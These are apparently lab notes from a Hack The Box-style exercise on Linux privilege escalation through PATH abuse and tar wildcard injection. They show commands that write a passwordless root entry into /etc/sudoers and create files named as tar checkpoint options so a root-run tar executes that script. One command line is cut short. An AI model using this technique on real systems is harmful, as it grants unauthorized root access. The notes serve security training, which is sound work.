Path Abuse: Linux PrivEsc

htb_student@NIX02:~$ echo $PATH
htb_student@NIX02:~$ pwd && conncheck 

Wildcard Abuse

*An asterisk that can match any number of characters in a file name.
?Matches a single character.
[ ]Brackets enclose characters and can match any single one at the defined position.
~A tilde at the beginning expands to the name of the user home directory or can have another username appended to refer to that user’s home directory.
-A hyphen within brackets will denote a range of characters.
htb_student@NIX02:~$ man tar
htb-student@NIX02:~$ echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' >
htb-student@NIX02:~$ echo "" > "--checkpoint-action=exec=sh"
htb-student@NIX02:~$ echo "" > --checkpoint=1
htb-student@NIX02:~$ sudo -l

Matching Defaults entries for htb-student on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User htb-student may run the following commands on NIX02:
    (root) NOPASSWD: ALL

Leave a Reply